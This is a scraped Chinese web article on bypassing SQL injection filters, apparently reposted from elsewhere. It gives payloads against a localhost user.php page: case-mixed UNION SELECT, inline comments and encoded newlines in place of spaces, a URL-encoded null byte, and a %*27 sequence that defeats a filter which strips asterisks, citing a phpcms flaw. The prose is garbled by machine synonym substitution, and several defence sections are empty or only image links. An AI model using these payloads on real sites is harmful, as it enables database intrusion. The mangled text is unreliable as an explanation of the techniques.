作家
登录

SQL注入防御与绕过的几种姿势

作者: 来源: 2017-05-08 09:20:11 阅读 我要评论

  1. http://localhost/injection/user.php?id=1uNion select null,null,null 

例子4:空格过滤

1)应用内联注释。

防御:

绕过:

2)应用换行符代替空格。留意办事器若为Windows则换行符为%0A%0D,Linux则为%0A。

payload:

平日的输入过滤器都是在应用法度榜样之外的代码实现的。比如入侵检测体系(IDS),这些系同一般是由原生编程说话开辟而成,比如C++,为什么空字节能起感化呢,就是因为在原生变成说话中,根据字符串肇端地位到第一个出现空字节的地位来肯定字符串长度。所以说空字节就有效的终止了字符串。

  1. http://localhost/injection/user.php?id=1/**/and/**/11=1 
  2. http://localhost/injection/user.php?id=1%0A%0Dand%0A%0D1=1 

例子5:空字节

绕过:

只须要在过滤器阻拦的字符串前面供给一个采取URL编码的空字节即可。

payload:

http://p3.qhimg.com/t010b93647c17389bbf.png

例子6:构造有意过滤

防御:

http://p9.qhimg.com/t01bb2f5ae28aa52562.png

绕过:

文件的63行开端可以看到,此处将传入的%27和%2527都进行删除处理,也就是还没传入数据库前就已经被该逝世的法度榜样吃了,然则在67行看到他还吃了*,如许我们就有办法了,我们构造%*27,如许法度榜样吃掉落星号*后,%27就会被传入。

  1. http://localhost/injection/user.php?id%3D1%*27%*20and%*20%*271%*27%3D%*271 

(id=1' and '1'='1-->id%3D1%*27%*20and%*20%*271%*27%3D%*271)

参考:

《phpcms_v9.6.0_sql注入与exp》:



  推荐阅读

  一份更好的云灾难恢复计划指南

大年夜多半云备份产品以专有的备份格局存储数据。在产生灾害的情况下,数据必须被提取,并由虚拟机有企业客户>>>详细阅读


本文标题:SQL注入防御与绕过的几种姿势

地址:http://www.17bianji.com/lsqh/35031.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)